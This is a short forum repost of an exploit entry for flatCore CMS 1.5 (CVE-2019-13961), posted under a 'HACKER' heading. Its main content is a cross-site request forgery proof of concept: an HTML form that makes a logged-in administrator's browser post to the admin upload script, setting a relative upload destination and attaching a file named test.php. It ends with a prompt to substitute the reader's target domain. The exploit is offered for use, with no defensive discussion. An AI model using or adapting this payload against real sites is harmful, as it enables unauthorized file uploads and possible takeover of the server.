By HireHackking in HACKER
· 1 view
# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: d3a5168
# Tested on: Ubuntu Windows
# CVE : CVE-2019-13961
PoC:
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="upload_destination" value="../content/files">
<input type="hidden" name="w" value="800">
<input type="hidden" name="h" value="600">
<input type="hidden" name="fz" value="1000">
<input type="hidden" name="unchanged" value="yes">
<input type="file" name="file" value="test.php">
<input type="submit" value="Upload">
</form>
</body>
</html>
[Replace Your Domain Name]
Recommended Comments